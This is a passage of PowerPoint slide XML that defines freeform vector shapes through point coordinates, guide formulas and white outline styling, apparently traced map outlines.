                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="54"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36281" name="Freeform 13"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5380" y="3651"/>
                <a:ext cx="124" cy="131"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 89 w 124"/>
                  <a:gd name="T1" fmla="*/ 69 h 131"/>
                  <a:gd name="T2" fmla="*/ 82 w 124"/>
                  <a:gd name="T3" fmla="*/ 74 h 131"/>
                  <a:gd name="T4" fmla="*/ 78 w 124"/>
                  <a:gd name="T5" fmla="*/ 77 h 131"/>
                  <a:gd name="T6" fmla="*/ 72 w 124"/>
                  <a:gd name="T7" fmla="*/ 76 h 131"/>
                  <a:gd name="T8" fmla="*/ 76 w 124"/>
                  <a:gd name="T9" fmla="*/ 82 h 131"/>
                  <a:gd name="T10" fmla="*/ 76 w 124"/>
                  <a:gd name="T11" fmla="*/ 86 h 131"/>
                  <a:gd name="T12" fmla="*/ 74 w 124"/>
                  <a:gd name="T13" fmla="*/ 90 h 131"/>
                  <a:gd name="T14" fmla="*/ 70 w 124"/>
                  <a:gd name="T15" fmla="*/ 91 h 131"/>
                  <a:gd name="T16" fmla="*/ 71 w 124"/>
                  <a:gd name="T17" fmla="*/ 98 h 131"/>
                  <a:gd name="T18" fmla="*/ 66 w 124"/>
                  <a:gd name="T19" fmla="*/ 113 h 131"/>
                  <a:gd name="T20" fmla="*/ 59 w 124"/>
                  <a:gd name="T21" fmla="*/ 120 h 131"/>
                  <a:gd name="T22" fmla="*/ 55 w 124"/>
                  <a:gd name="T23" fmla="*/ 124 h 131"/>
                  <a:gd name="T24" fmla="*/ 47 w 124"/>
                  <a:gd name="T25" fmla="*/ 131 h 131"/>
                  <a:gd name="T26" fmla="*/ 36 w 124"/>
                  <a:gd name="T27" fmla="*/ 128 h 131"/>
                  <a:gd name="T28" fmla="*/ 27 w 124"/>
                  <a:gd name="T29" fmla="*/ 125 h 131"/>
                  <a:gd name="T30" fmla="*/ 19 w 124"/>
                  <a:gd name="T31" fmla="*/ 122 h 131"/>
                  <a:gd name="T32" fmla="*/ 14 w 124"/>
                  <a:gd name="T33" fmla="*/ 118 h 131"/>
                  <a:gd name="T34" fmla="*/ 12 w 124"/>
                  <a:gd name="T35" fmla="*/ 121 h 131"/>
                  <a:gd name="T36" fmla="*/ 5 w 124"/>
                  <a:gd name="T37" fmla="*/ 121 h 131"/>
                  <a:gd name="T38" fmla="*/ 0 w 124"/>
                  <a:gd name="T39" fmla="*/ 117 h 131"/>
                  <a:gd name="T40" fmla="*/ 2 w 124"/>
                  <a:gd name="T41" fmla="*/ 114 h 131"/>
                  <a:gd name="T42" fmla="*/ 6 w 124"/>
                  <a:gd name="T43" fmla="*/ 112 h 131"/>
                  <a:gd name="T44" fmla="*/ 9 w 124"/>
                  <a:gd name="T45" fmla="*/ 110 h 131"/>
                  <a:gd name="T46" fmla="*/ 6 w 124"/>
                  <a:gd name="T47" fmla="*/ 103 h 131"/>
                  <a:gd name="T48" fmla="*/ 14 w 124"/>
                  <a:gd name="T49" fmla="*/ 103 h 131"/>
                  <a:gd name="T50" fmla="*/ 11 w 124"/>
                  <a:gd name="T51" fmla="*/ 99 h 131"/>
                  <a:gd name="T52" fmla="*/ 13 w 124"/>
                  <a:gd name="T53" fmla="*/ 93 h 131"/>
                  <a:gd name="T54" fmla="*/ 19 w 124"/>
                  <a:gd name="T55" fmla="*/ 87 h 131"/>
                  <a:gd name="T56" fmla="*/ 24 w 124"/>
                  <a:gd name="T57" fmla="*/ 80 h 131"/>
                  <a:gd name="T58" fmla="*/ 39 w 124"/>
                  <a:gd name="T59" fmla="*/ 72 h 131"/>
                  <a:gd name="T60" fmla="*/ 48 w 124"/>
                  <a:gd name="T61" fmla="*/ 65 h 131"/>
                  <a:gd name="T62" fmla="*/ 56 w 124"/>
                  <a:gd name="T63" fmla="*/ 59 h 131"/>
                  <a:gd name="T64" fmla="*/ 60 w 124"/>
                  <a:gd name="T65" fmla="*/ 53 h 131"/>
                  <a:gd name="T66" fmla="*/ 68 w 124"/>
                  <a:gd name="T67" fmla="*/ 50 h 131"/>
                  <a:gd name="T68" fmla="*/ 74 w 124"/>
                  <a:gd name="T69" fmla="*/ 44 h 131"/>
                  <a:gd name="T70" fmla="*/ 76 w 124"/>
                  <a:gd name="T71" fmla="*/ 41 h 131"/>
                  <a:gd name="T72" fmla="*/ 78 w 124"/>
                  <a:gd name="T73" fmla="*/ 33 h 131"/>
                  <a:gd name="T74" fmla="*/ 80 w 124"/>
                  <a:gd name="T75" fmla="*/ 27 h 131"/>
                  <a:gd name="T76" fmla="*/ 82 w 124"/>
                  <a:gd name="T77" fmla="*/ 25 h 131"/>
                  <a:gd name="T78" fmla="*/ 90 w 124"/>
                  <a:gd name="T79" fmla="*/ 20 h 131"/>
                  <a:gd name="T80" fmla="*/ 92 w 124"/>
                  <a:gd name="T81" fmla="*/ 6 h 131"/>
                  <a:gd name="T82" fmla="*/ 98 w 124"/>
                  <a:gd name="T83" fmla="*/ 1 h 131"/>
                  <a:gd name="T84" fmla="*/ 101 w 124"/>
                  <a:gd name="T85" fmla="*/ 5 h 131"/>
                  <a:gd name="T86" fmla="*/ 104 w 124"/>
                  <a:gd name="T87" fmla="*/ 7 h 131"/>
                  <a:gd name="T88" fmla="*/ 108 w 124"/>
                  <a:gd name="T89" fmla="*/ 17 h 131"/>
                  <a:gd name="T90" fmla="*/ 118 w 124"/>
                  <a:gd name="T91" fmla="*/ 11 h 131"/>
                  <a:gd name="T92" fmla="*/ 122 w 124"/>
                  <a:gd name="T93" fmla="*/ 16 h 131"/>
                  <a:gd name="T94" fmla="*/ 123 w 124"/>
                  <a:gd name="T95" fmla="*/ 24 h 131"/>
                  <a:gd name="T96" fmla="*/ 119 w 124"/>
                  <a:gd name="T97" fmla="*/ 33 h 131"/>
                  <a:gd name="T98" fmla="*/ 114 w 124"/>
                  <a:gd name="T99" fmla="*/ 41 h 131"/>
                  <a:gd name="T100" fmla="*/ 104 w 124"/>
                  <a:gd name="T101" fmla="*/ 51 h 131"/>
                  <a:gd name="T102" fmla="*/ 100 w 124"/>
                  <a:gd name="T103" fmla="*/ 55 h 131"/>
                  <a:gd name="T104" fmla="*/ 95 w 124"/>
                  <a:gd name="T105" fmla="*/ 59 h 131"/>
                  <a:gd name="T106" fmla="*/ 101 w 124"/>
                  <a:gd name="T107" fmla="*/ 64 h 131"/>
                  <a:gd name="T108" fmla="*/ 102 w 124"/>
                  <a:gd name="T109" fmla="*/ 67 h 131"/>
                  <a:gd name="T110" fmla="*/ 95 w 124"/>
                  <a:gd name="T111" fmla="*/ 65 h 131"/>
                  <a:gd name="T112" fmla="*/ 89 w 124"/>
                  <a:gd name="T113" fmla="*/ 68 h 131"/>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24"/>
                  <a:gd name="T172" fmla="*/ 0 h 131"/>
                  <a:gd name="T173" fmla="*/ 124 w 124"/>
                  <a:gd name="T174" fmla="*/ 131 h 131"/>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24" h="131">
                    <a:moveTo>
                      <a:pt x="89" y="68"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="89" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="68"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36282" name="Freeform 14"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4972" y="2988"/>
                <a:ext cx="183" cy="127"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 137 w 183"/>
                  <a:gd name="T1" fmla="*/ 54 h 127"/>
                  <a:gd name="T2" fmla="*/ 129 w 183"/>
                  <a:gd name="T3" fmla="*/ 52 h 127"/>
                  <a:gd name="T4" fmla="*/ 120 w 183"/>
                  <a:gd name="T5" fmla="*/ 47 h 127"/>
                  <a:gd name="T6" fmla="*/ 129 w 183"/>
                  <a:gd name="T7" fmla="*/ 45 h 127"/>
                  <a:gd name="T8" fmla="*/ 142 w 183"/>
                  <a:gd name="T9" fmla="*/ 46 h 127"/>
                  <a:gd name="T10" fmla="*/ 146 w 183"/>
                  <a:gd name="T11" fmla="*/ 42 h 127"/>
                  <a:gd name="T12" fmla="*/ 152 w 183"/>
                  <a:gd name="T13" fmla="*/ 46 h 127"/>
                  <a:gd name="T14" fmla="*/ 164 w 183"/>
                  <a:gd name="T15" fmla="*/ 38 h 127"/>
                  <a:gd name="T16" fmla="*/ 172 w 183"/>
                  <a:gd name="T17" fmla="*/ 35 h 127"/>
                  <a:gd name="T18" fmla="*/ 172 w 183"/>
                  <a:gd name="T19" fmla="*/ 25 h 127"/>
                  <a:gd name="T20" fmla="*/ 180 w 183"/>
                  <a:gd name="T21" fmla="*/ 25 h 127"/>
                  <a:gd name="T22" fmla="*/ 182 w 183"/>
                  <a:gd name="T23" fmla="*/ 35 h 127"/>
                  <a:gd name="T24" fmla="*/ 176 w 183"/>
                  <a:gd name="T25" fmla="*/ 38 h 127"/>
                  <a:gd name="T26" fmla="*/ 178 w 183"/>
                  <a:gd name="T27" fmla="*/ 45 h 127"/>
                  <a:gd name="T28" fmla="*/ 167 w 183"/>
                  <a:gd name="T29" fmla="*/ 46 h 127"/>
                  <a:gd name="T30" fmla="*/ 162 w 183"/>
                  <a:gd name="T31" fmla="*/ 52 h 127"/>
                  <a:gd name="T32" fmla="*/ 146 w 183"/>
                  <a:gd name="T33" fmla="*/ 56 h 127"/>
                  <a:gd name="T34" fmla="*/ 4 w 183"/>
                  <a:gd name="T35" fmla="*/ 78 h 127"/>
                  <a:gd name="T36" fmla="*/ 4 w 183"/>
                  <a:gd name="T37" fmla="*/ 57 h 127"/>
                  <a:gd name="T38" fmla="*/ 27 w 183"/>
                  <a:gd name="T39" fmla="*/ 8 h 127"/>
                  <a:gd name="T40" fmla="*/ 49 w 183"/>
                  <a:gd name="T41" fmla="*/ 16 h 127"/>
                  <a:gd name="T42" fmla="*/ 60 w 183"/>
                  <a:gd name="T43" fmla="*/ 19 h 127"/>
                  <a:gd name="T44" fmla="*/ 69 w 183"/>
                  <a:gd name="T45" fmla="*/ 27 h 127"/>
                  <a:gd name="T46" fmla="*/ 77 w 183"/>
                  <a:gd name="T47" fmla="*/ 42 h 127"/>
                  <a:gd name="T48" fmla="*/ 84 w 183"/>
                  <a:gd name="T49" fmla="*/ 46 h 127"/>
                  <a:gd name="T50" fmla="*/ 106 w 183"/>
                  <a:gd name="T51" fmla="*/ 53 h 127"/>
                  <a:gd name="T52" fmla="*/ 111 w 183"/>
                  <a:gd name="T53" fmla="*/ 63 h 127"/>
                  <a:gd name="T54" fmla="*/ 98 w 183"/>
                  <a:gd name="T55" fmla="*/ 65 h 127"/>
                  <a:gd name="T56" fmla="*/ 102 w 183"/>
                  <a:gd name="T57" fmla="*/ 76 h 127"/>
                  <a:gd name="T58" fmla="*/ 118 w 183"/>
                  <a:gd name="T59" fmla="*/ 93 h 127"/>
                  <a:gd name="T60" fmla="*/ 127 w 183"/>
                  <a:gd name="T61" fmla="*/ 101 h 127"/>
                  <a:gd name="T62" fmla="*/ 135 w 183"/>
                  <a:gd name="T63" fmla="*/ 102 h 127"/>
                  <a:gd name="T64" fmla="*/ 137 w 183"/>
                  <a:gd name="T65" fmla="*/ 109 h 127"/>
                  <a:gd name="T66" fmla="*/ 145 w 183"/>
                  <a:gd name="T67" fmla="*/ 111 h 127"/>
                  <a:gd name="T68" fmla="*/ 142 w 183"/>
                  <a:gd name="T69" fmla="*/ 115 h 127"/>
                  <a:gd name="T70" fmla="*/ 156 w 183"/>
                  <a:gd name="T71" fmla="*/ 125 h 127"/>
                  <a:gd name="T72" fmla="*/ 146 w 183"/>
                  <a:gd name="T73" fmla="*/ 125 h 127"/>
                  <a:gd name="T74" fmla="*/ 137 w 183"/>
                  <a:gd name="T75" fmla="*/ 121 h 127"/>
                  <a:gd name="T76" fmla="*/ 119 w 183"/>
                  <a:gd name="T77" fmla="*/ 118 h 127"/>
                  <a:gd name="T78" fmla="*/ 106 w 183"/>
                  <a:gd name="T79" fmla="*/ 114 h 127"/>
                  <a:gd name="T80" fmla="*/ 97 w 183"/>
                  <a:gd name="T81" fmla="*/ 106 h 127"/>
                  <a:gd name="T82" fmla="*/ 85 w 183"/>
                  <a:gd name="T83" fmla="*/ 90 h 127"/>
                  <a:gd name="T84" fmla="*/ 67 w 183"/>
                  <a:gd name="T85" fmla="*/ 81 h 127"/>
                  <a:gd name="T86" fmla="*/ 55 w 183"/>
                  <a:gd name="T87" fmla="*/ 80 h 127"/>
                  <a:gd name="T88" fmla="*/ 49 w 183"/>
                  <a:gd name="T89" fmla="*/ 83 h 127"/>
                  <a:gd name="T90" fmla="*/ 44 w 183"/>
                  <a:gd name="T91" fmla="*/ 84 h 127"/>
                  <a:gd name="T92" fmla="*/ 43 w 183"/>
                  <a:gd name="T93" fmla="*/ 88 h 127"/>
                  <a:gd name="T94" fmla="*/ 24 w 183"/>
                  <a:gd name="T95" fmla="*/ 88 h 127"/>
                  <a:gd name="T96" fmla="*/ 32 w 183"/>
                  <a:gd name="T97" fmla="*/ 91 h 127"/>
                  <a:gd name="T98" fmla="*/ 41 w 183"/>
                  <a:gd name="T99" fmla="*/ 99 h 127"/>
                  <a:gd name="T100" fmla="*/ 30 w 183"/>
                  <a:gd name="T101" fmla="*/ 105 h 127"/>
                  <a:gd name="T102" fmla="*/ 4 w 183"/>
                  <a:gd name="T103" fmla="*/ 103 h 127"/>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83"/>
                  <a:gd name="T157" fmla="*/ 0 h 127"/>
                  <a:gd name="T158" fmla="*/ 183 w 183"/>
                  <a:gd name="T159" fmla="*/ 127 h 127"/>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83" h="127">
                    <a:moveTo>
                      <a:pt x="140" y="57"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="139" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="175" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
